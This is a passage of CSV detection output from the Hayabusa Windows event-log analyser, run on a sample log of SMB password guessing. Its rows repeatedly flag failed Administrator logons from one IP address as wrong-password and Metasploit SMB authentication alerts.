Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
